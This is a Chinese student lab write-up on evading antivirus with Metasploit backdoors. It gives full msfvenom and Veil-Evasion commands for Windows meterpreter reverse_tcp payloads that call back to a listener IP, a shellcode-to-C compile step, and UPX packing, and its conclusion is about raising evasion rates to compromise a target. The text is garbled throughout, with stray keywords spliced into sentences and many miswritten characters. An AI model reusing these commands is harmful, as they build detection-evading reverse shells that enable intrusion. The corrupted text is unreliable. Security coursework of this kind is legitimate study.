免杀是作什么?python
恶意代码避免杀毒软件查杀,从而实现入侵。免杀的基本方法有哪些?shell
将实验二中生成的后门程序上传到virscan中进行扫描,扫描信息及结果以下:
windows
根据扫描结果,有48%的杀软检测出了病毒。数组
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.204.128 LPORT=5330 -f exe > 5330exp3.exe
生成一次编码过的可执行文件扫描文件,仍是被那么多的杀软查杀到,那么屡次编码好像也没有太大的做用。
网络
veil-evasion
命令打开该软件。use python/meterpreter/rev_tcp //设置payload set LHOST 192.168.204.138 //设置反弹链接win-IP set port 443 //设置反弹端口443,默认为4444 generate //生成 5330 //程序名 1
从路径/var/lib/veil-evasion/output/compiled
找到相应程序,放到网站上扫描,结果以下:
tcp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Kali-IP LPORT=443 -f c
,生成一个C语言数组。touch
命令生成):MSSC_5330.c(免杀shellcode),将上面生成的数组copy到该文件下,并加入一个主函数。i686-w64-mingw32-g++ MSSC_5330.c -o MSSC_5330.exe
命令将该C语言代码转换为一个可在64位windows系统下操做的可执行文件MSSC_5330.exe。经过nc
命令将可执行文件传到win7主机上,很快就被查杀了QAQ。
函数
upx #须要加壳的文件名 -o #加壳后的文件名
,生成程序。过了一会,又被查杀了TUT。
网站
应该是对编写免杀代码还不太了解,以目前的能力还只能依靠软件来生成代码,若是是纯手工的代码可能免杀的概率会更大一些。编码
经过不一样的方式对恶意代码生成病毒程序有了必定的了解,能够简单制做出一些免杀后门。从而也了解到了目前咱们所信赖的杀软其实仍是存在着一些漏洞,假设将shellcode进行从新组合再加壳的话,免杀率应该还会再上升,从而经过杀软的扫描,入侵靶机。3d